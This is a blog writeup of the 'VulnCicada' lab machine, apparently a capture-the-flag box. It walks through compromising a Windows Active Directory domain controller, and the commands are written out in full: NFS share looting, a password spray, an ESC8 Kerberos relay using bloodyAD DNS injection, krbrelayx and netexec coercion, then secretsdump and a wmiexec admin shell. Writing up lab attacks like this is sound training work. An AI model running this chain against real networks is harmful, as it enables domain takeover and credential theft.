Myles Nieman
← All writeups

VulnCicada

Overview

VulnCicada is a medium Windows Active Directory box built around NFS exposure and AD CS abuse. A world-readable NFS profiles share leaks a list of domain users; one profile contains an image file that hides a plaintext credential. Spraying that password (with proper Kerberos authentication against the FQDN) identifies the account owner as Rosie.Powell. From there, Certipy finds the CA is vulnerable to ESC8 — Web Enrollment is enabled without signing enforcement. Combining bloodyAD DNS record insertion, krbrelayx, and netexec coerce_plus relays the DC machine account’s Kerberos authentication to the Web Enrollment endpoint, producing a certificate that can be used to recover the Administrator NTLM hash via secretsdump.

Path: anonymous NFS → image credential → Rosie.Powell → ESC8 Kerberos relay → DC certificate → Administrator NTLM → domain admin.

Enumeration

$ nmap 10.129.235.233
PORT     STATE SERVICE
53/tcp   open  domain
80/tcp   open  http
88/tcp   open  kerberos-sec
111/tcp  open  rpcbind
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
2049/tcp open  nfs
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
3389/tcp open  ms-wbt-server

VulnCicada target connectivity verified

Nmap scan results for cicada.vl

The scan fingerprints a Windows domain controller at cicada.vl / DC-JPQ225.cicada.vl. Two things stand out immediately: NFS on 2049 (unusual for a DC) and the standard AD CS cluster. I added both the short and FQDN to /etc/hosts.

10.129.235.233 cicada.vl DC-JPQ225.cicada.vl

SMB

$ smbclient -L \\\\cicada.vl\\

SMB share listing for cicada.vl

Nothing accessible anonymously.

NFS

$ showmount -e cicada.vl

NFS exports listing showing the /profiles share

$ sudo mount cicada.vl:/profiles /mnt/nfs_share/

NFS profiles share mounted successfully

The mounted share contains home directories for eleven accounts:

Administrator, Daniel.Marshall, Debra.Wright, Jane.Carter, Jordan.Francis,
Joyce.Andrews, Katie.Ward, Megan.Simpson, Richard.Gibbons, Rosie.Powell, Shirley.West

NFS share directory listing showing all profile directories

Foothold — Credential in NFS Image

AS-REP Roasting attempt

With a clean username list I tried AS-REP roasting first:

$ GetNPUsers.py -usersfile userlist -request -format hashcat -outputfile ASREProastables.txt -dc-ip 10.129.235.233 'cicada.vl/'

AS-REP roasting results — no valid hashes returned

No pre-auth disabled accounts.

Image files on the share

A recursive look at the share shows that only two directories contain files: Administrator/vacation.png and Rosie.Powell/marketing.png. The Administrator image copies fine, but Rosie’s file returns Permission denied. Elevating locally with sudo chmod on the NFS-mounted path works around it:

$ sudo chmod +r /mnt/nfs_share/Rosie.Powell/marketing.png
$ cp /mnt/nfs_share/Rosie.Powell/marketing.png .

Administrator’s vacation.png — the image itself

The website on port 80 offers nothing useful:

Port 80 website — unhelpful

Opening marketing.png reveals embedded plaintext credentials:

marketing.png contains a password in plain sight

Password spray

Spraying the recovered password against the user list via plain SMB produces no hits. The DC enforces Kerberos-only authentication (NTLM disabled), so the spray needs the FQDN and -k:

$ nxc smb DC-JPQ225.cicada.vl -u userlist -p "Cicada123" -d "cicada.vl" -k

Password spray with Kerberos auth — Rosie.Powell matches

Rosie.Powell is the owner of the credential.

Privilege Escalation — ESC8 via Kerberos Relay

Discovering the CA

Checking shares as Rosie reveals the AD CS infrastructure is present:

$ nxc smb DC-JPQ225.cicada.vl -u rosie.powell -p "Cicada123" -d "cicada.vl" -k --shares

Share listing confirms AD CS is in scope

Running Certipy to enumerate vulnerabilities. Kerberos errors appear with a plain DC IP; passing the FQDN as -dc-ip and specifying the nameserver resolves them:

$ certipy find -k -vulnerable -text -dc-ip DC-JPQ225.cicada.vl -no-pass -ns 10.129.235.234

Certipy find output identifying the CA and vulnerabilities

The CA cicada-DC-JPQ225-CA has Web Enrollment enabled with Request Disposition: Issue and no signing enforced — the conditions for ESC8.

ESC8 confirmed — Web Enrollment enabled without signing enforcement

Kerberos relay chain

ESC8 via Kerberos relay requires three moving parts: a DNS record pointing to the attacker host, a relay listener, and a coercion trigger.

1. Add a DNS record pointing to our host (using bloodyAD since dnstool.py produced errors):

$ python3 bloodyAD.py --host dc-jpq225.cicada.vl -u 'rosie.powell' -p 'Cicada123' \
    -k -d 'cicada.vl' add dnsRecord 'dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' 10.10.14.8

2. Start krbrelayx to relay incoming Kerberos authentication to the Web Enrollment endpoint:

$ python3 krbrelayx.py -t 'http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp' \
    --adcs --template DomainController -v 'CICADA'

3. Coerce DC authentication using netexec coerce_plus (PetitPotam and Coercer did not work here):

$ netexec smb DC-JPQ225.cicada.vl -u Rosie.Powell -p Cicada123 -k -M coerce_plus \
    -o LISTENER=dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA

Coerce_plus module triggering the DC’s outbound authentication

krbrelayx captures the relay and obtains a certificate

PFX certificate saved to disk

The relay succeeds and krbrelayx saves a .pfx certificate for the DC machine account.

Root

With the DC machine account certificate, authenticate to retrieve the Administrator’s NTLM hash:

Certipy authenticates with the PFX to obtain the NT hash

$ secretsdump.py cicada.vl/dc-jpq225\$@dc-jpq225.cicada.vl -k -no-pass -just-dc-user Administrator

secretsdump extracts the Administrator NTLM hash

Pull a TGT for Administrator using the hash, then get a shell with wmiexec:

$ getTGT.py cicada.vl/Administrator -hashes :85a0da53871a9d56b6cd05deda3a5e87 -dc-ip 10.129.235.250
$ wmiexec.py cicada.vl/Administrator@dc-jpq225.cicada.vl -k -no-pass

wmiexec session as Administrator

Domain compromised — Administrator shell on DC-JPQ225

Takeaways

  • Exposed NFS on a DC is an unusual and high-value target — world-readable profile directories can leak usernames, files, and even embedded credentials without touching SMB at all.
  • ESC8 requires three coordinated steps (DNS poisoning, relay listener, coercion trigger) but netexec coerce_plus makes the coercion piece straightforward when PetitPotam falls short. The Kerberos-only domain environment also meant every tool needed explicit FQDN targeting and -k flags rather than NTLM.